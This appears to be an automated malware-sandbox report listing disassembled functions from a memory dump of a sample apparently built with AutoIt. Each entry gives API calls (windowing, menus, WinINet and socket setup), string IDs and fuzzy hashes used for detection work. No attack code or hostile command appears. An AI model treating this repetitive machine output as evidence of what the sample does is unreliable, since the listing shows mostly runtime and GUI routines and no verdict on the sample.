                                                    Function 00686CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00686D86
                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00686DC2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$DestroyMove
                                                    • String ID: static
                                                    • API String ID: 2139405536-2160076837
                                                    • Opcode ID: 8bd365a370557e2d2aca7ce36820c00bb572a5266dd044ab956fd5effd1f9189
                                                    • Instruction ID: 94c356121557f58d68889191a09866b8cf1ecdcdb716e4b9af69ac3de1472afa
                                                    • Opcode Fuzzy Hash: 8bd365a370557e2d2aca7ce36820c00bb572a5266dd044ab956fd5effd1f9189
                                                    • Instruction Fuzzy Hash: BD318F71200604AEDB14AF68DC80FFB77BAFF48724F10961DF9A597290DA71AC91CB64
                                                    Function 00662D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00662E00
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00662E3B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: InfoItemMenu_memset
                                                    • String ID: 0
                                                    • API String ID: 2223754486-4108050209
                                                    • Opcode ID: c5d3bc07cd2af0214acbacd556141282be8a795525b410a1141b6d11773aa0a6
                                                    • Instruction ID: b5e24090fdf3e4271294c5e1a230e2c46647a88395e32b9fccd4b61879a42138
                                                    • Opcode Fuzzy Hash: c5d3bc07cd2af0214acbacd556141282be8a795525b410a1141b6d11773aa0a6
                                                    • Instruction Fuzzy Hash: 5A310631A0070BABEB248F48D985BEEBBBBFF05300F14043DED85962A1D7719940CB14
                                                    Function 00686943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 006869D0
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006869DB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: Combobox
                                                    • API String ID: 3850602802-2096851135
                                                    • Opcode ID: b35d17952b83d09af41d1a8bfa9784cd70e9a49b50e45b1cc5ed6fe18d98f8c2
                                                    • Instruction ID: dd2ea113d9d299a37b796577c8f7efd66e2fd7577a45cb318c3ddca6e8757053
                                                    • Opcode Fuzzy Hash: b35d17952b83d09af41d1a8bfa9784cd70e9a49b50e45b1cc5ed6fe18d98f8c2
                                                    • Instruction Fuzzy Hash: CC11827160020A6FEF15AF14CC90EFB376BEB993A4F114229F9589B3D0D6719C9187A0
                                                    Function 00686E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00601D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00601D73
                                                      • Part of subcall function 00601D35: GetStockObject.GDI32(00000011), ref: 00601D87
                                                      • Part of subcall function 00601D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00601D91
                                                    • GetWindowRect.USER32(00000000,?), ref: 00686EE0
                                                    • GetSysColor.USER32(00000012), ref: 00686EFA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                    • String ID: static
                                                    • API String ID: 1983116058-2160076837
                                                    • Opcode ID: 073b86fdc940303e4f780471b0c290033775db16b0bb47f695ce6e9a2544db48
                                                    • Instruction ID: bb2d62bcfcd2c56c13e2f8d8c4b4b9c6adaf1ad6784ea0f9012572e19b54bf82
                                                    • Opcode Fuzzy Hash: 073b86fdc940303e4f780471b0c290033775db16b0bb47f695ce6e9a2544db48
                                                    • Instruction Fuzzy Hash: F4215972610209AFDB05EFA8DC45EFA7BBAFB08314F005628F955D3250E634E8619B60
                                                    Function 00686B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00686C11
                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00686C20
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: LengthMessageSendTextWindow
                                                    • String ID: edit
                                                    • API String ID: 2978978980-2167791130
                                                    • Opcode ID: 8d49f91b27d13d09b92e98f915d427a293b67261e0ffe18d1627651af5a8d608
                                                    • Instruction ID: e8cce91fff80aff1c23541ce5eb2807b4bdc75a9244a957b588b7a3f76992d4f
                                                    • Opcode Fuzzy Hash: 8d49f91b27d13d09b92e98f915d427a293b67261e0ffe18d1627651af5a8d608
                                                    • Instruction Fuzzy Hash: FB116671501208ABEB10AF64DC81AEB3B6BEB15378F604728F961D72E0C675DCA19B60
                                                    Function 00662E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00662F11
                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00662F30
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: InfoItemMenu_memset
                                                    • String ID: 0
                                                    • API String ID: 2223754486-4108050209
                                                    • Opcode ID: efbfa83dc2a7f9260c4d0a85bfedf6d09f10f208cba5d178de59a93fb7907a90
                                                    • Instruction ID: d9dade8ece17b63e46794f6377d8246d74ecce626580ab48e9bf38756e5818de
                                                    • Opcode Fuzzy Hash: efbfa83dc2a7f9260c4d0a85bfedf6d09f10f208cba5d178de59a93fb7907a90
                                                    • Instruction Fuzzy Hash: AB11DD31901626ABCB20DB98ED14FE977BBEB01310F0800B5F854E73A1DBB2AE048795
                                                    Function 006724CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00672520
                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00672549
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Internet$OpenOption
                                                    • String ID: <local>
                                                    • API String ID: 942729171-4266983199
                                                    • Opcode ID: 07135016577c5eec28ec10e3e5e4f559e5fc1d1bf619d2dc3749dfe6f43129e2
                                                    • Instruction ID: c25ba340e2edf50ee339ca7fd072238505b6bff6b5869c8b5afeac60fcebea86
                                                    • Opcode Fuzzy Hash: 07135016577c5eec28ec10e3e5e4f559e5fc1d1bf619d2dc3749dfe6f43129e2
                                                    • Instruction Fuzzy Hash: 2211C670541226BAEB248F61CCA5EFBFFAAFF05751F10C22AF50946140D2705991DBF0
                                                    Function 006780A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0067830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,006780C8,?,00000000,?,?), ref: 00678322
                                                    • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006780CB
                                                    • htons.WSOCK32(00000000,?,00000000), ref: 00678108
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWidehtonsinet_addr
                                                    • String ID: 255.255.255.255
                                                    • API String ID: 2496851823-2422070025
                                                    • Opcode ID: 4e61d9020b6043a94647f551a638b02a6e80f201f76056e94b0f7e9c5ad529ef
                                                    • Instruction ID: 7d3ecd91f1ff2c170dad41aad253ef18004476ab89282f327d3515d0466285f9
                                                    • Opcode Fuzzy Hash: 4e61d9020b6043a94647f551a638b02a6e80f201f76056e94b0f7e9c5ad529ef
                                                    • Instruction Fuzzy Hash: E411E534640205ABDB10AFA4CC4AFEEB326FF14320F10851AF915973D1DA31AC15CB59
                                                    Function 00610A8D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00603C26,006C62F8,?,?,?), ref: 00610ACE
                                                      • Part of subcall function 00607D2C: _memmove.LIBCMT ref: 00607D66
                                                    • _wcscat.LIBCMT ref: 006450E1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: FullNamePath_memmove_wcscat
                                                    • String ID: cl
                                                    • API String ID: 257928180-4008018315
                                                    • Opcode ID: 304ca03f291002e5e8e0bd9e7e1ba5f4de0c7b9549ea3323816b91358d185d2f
                                                    • Instruction ID: 3f9768733a3b5c0236d94a503446f0e11331816a5c132330ce0c91fd338f5843
                                                    • Opcode Fuzzy Hash: 304ca03f291002e5e8e0bd9e7e1ba5f4de0c7b9549ea3323816b91358d185d2f
                                                    • Instruction Fuzzy Hash: AE11C835908218ABCB44FB74CC01EED77BBEF08350B0401A9B94DD7281EA70EBC58B69
                                                    Function 006592E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                      • Part of subcall function 0065B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0065B0E7
                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00659355
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 372448540-1403004172
                                                    • Opcode ID: 046d330ab96c2d552143d5425da05d35af21a2ff95f753f9c8a43ec643b0c01d
                                                    • Instruction ID: 5df4c0527d01881b0a4a051207890007f531e7046eeba5fd92150a0888fef549
                                                    • Opcode Fuzzy Hash: 046d330ab96c2d552143d5425da05d35af21a2ff95f753f9c8a43ec643b0c01d
                                                    • Instruction Fuzzy Hash: BF019E71A85219EBCB48EBA4CC918FF776BBF06320B140619B972572D1DA31694CD760
                                                    Function 006591DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                      • Part of subcall function 0065B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0065B0E7
                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 0065924D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 372448540-1403004172
                                                    • Opcode ID: 6ce5e052fde701cb7fcbb08bc6a16bc1ca9eed4773397d0392428d127f47561e
                                                    • Instruction ID: 8152427aeaaf6876dc4157870192e77bc84378110f622bda8f60627bb5387380
                                                    • Opcode Fuzzy Hash: 6ce5e052fde701cb7fcbb08bc6a16bc1ca9eed4773397d0392428d127f47561e
                                                    • Instruction Fuzzy Hash: 68018471A81209BBCB58EBA0C992DFF73AA9F05301F140119B916672C1EA156F0C9675
                                                    Function 00659264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                      • Part of subcall function 0065B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0065B0E7
                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 006592D0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 372448540-1403004172
                                                    • Opcode ID: 54b0a780a5325a417f84cd659a4342e1ab2977c553df5dd714b18888b10d4308
                                                    • Instruction ID: 5990c1928d72d71056e53d701b88dca9a75e5b0aa1bc1a51aedab31181bd5865
                                                    • Opcode Fuzzy Hash: 54b0a780a5325a417f84cd659a4342e1ab2977c553df5dd714b18888b10d4308
                                                    • Instruction Fuzzy Hash: 3501D6B1E81209B7CF14EBA4C982EFFB7AE9F15301F240119BD12632C2DA255F4C9675
                                                    Function 00626DAE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __calloc_crt
                                                    • String ID: @Rl
                                                    • API String ID: 3494438863-1129465463
                                                    • Opcode ID: 2ddc69104d00b6f02621b7768b2336051a65d97e3aea86c6f7cbc17c4cbdb97c
                                                    • Instruction ID: 22516cec1efe216b14553e886b888b672799473d647703c98f62f58bb0ab6850
                                                    • Opcode Fuzzy Hash: 2ddc69104d00b6f02621b7768b2336051a65d97e3aea86c6f7cbc17c4cbdb97c
                                                    • Instruction Fuzzy Hash: 7EF06271309A2A9BF764DF28FD51BB56797EF00720B10082AF105DB2D0EFB489818B88
                                                    Function 006651CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ClassName_wcscmp
                                                    • String ID: #32770
                                                    • API String ID: 2292705959-463685578
                                                    • Opcode ID: 1aa377b7eec6d364e519e6cb3729dd9dcc76f8971da2b50d0804c5a5ba53c793
                                                    • Instruction ID: e023a97d23c2966f0985941cb4a1a2a9ccea66109b0e10aa13f04f4c77c75ddc
                                                    • Opcode Fuzzy Hash: 1aa377b7eec6d364e519e6cb3729dd9dcc76f8971da2b50d0804c5a5ba53c793
                                                    • Instruction Fuzzy Hash: 62E06872A0023C2BE7209B99AC0AFE7F7ADEB40771F00016BFD10D3140E6709A448BE0
                                                    Function 006581BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 006581CA
                                                      • Part of subcall function 00623598: _doexit.LIBCMT ref: 006235A2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Message_doexit
                                                    • String ID: AutoIt$Error allocating memory.
                                                    • API String ID: 1993061046-4017498283
                                                    • Opcode ID: 747d9a08537b187752ce22116830b416ac1928ad302e4819b1cb2eaf4eaae9c5
                                                    • Instruction ID: f549391b509e63116a527ccd875836bdc9f00b02287a9d99a4c2338a3150a3a4
                                                    • Opcode Fuzzy Hash: 747d9a08537b187752ce22116830b416ac1928ad302e4819b1cb2eaf4eaae9c5
                                                    • Instruction Fuzzy Hash: 21D02B323C432D32D26433B43C07FC6368A4B15B12F10442ABB08695C38ED548C143EC
                                                    Function 0063B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0063B564: _memset.LIBCMT ref: 0063B571
                                                      • Part of subcall function 00620B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0063B540,?,?,?,0060100A), ref: 00620B89
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,0060100A), ref: 0063B544
                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0060100A), ref: 0063B553
                                                    Strings
                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0063B54E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                    • API String ID: 3158253471-631824599
                                                    • Opcode ID: f8779d44c14a3269fa02dae6f0972ee3fb41a3519f2089572e43990e724f5504
                                                    • Instruction ID: 3d01b67c0a97c6eca464446554c7e8269c9f284bef0d7765de63754815e991be
                                                    • Opcode Fuzzy Hash: f8779d44c14a3269fa02dae6f0972ee3fb41a3519f2089572e43990e724f5504
                                                    • Instruction Fuzzy Hash: B8E06DB02007128BD760EF68E4047427BE2AB00755F009A2DE546C2251D7B4D944CFA1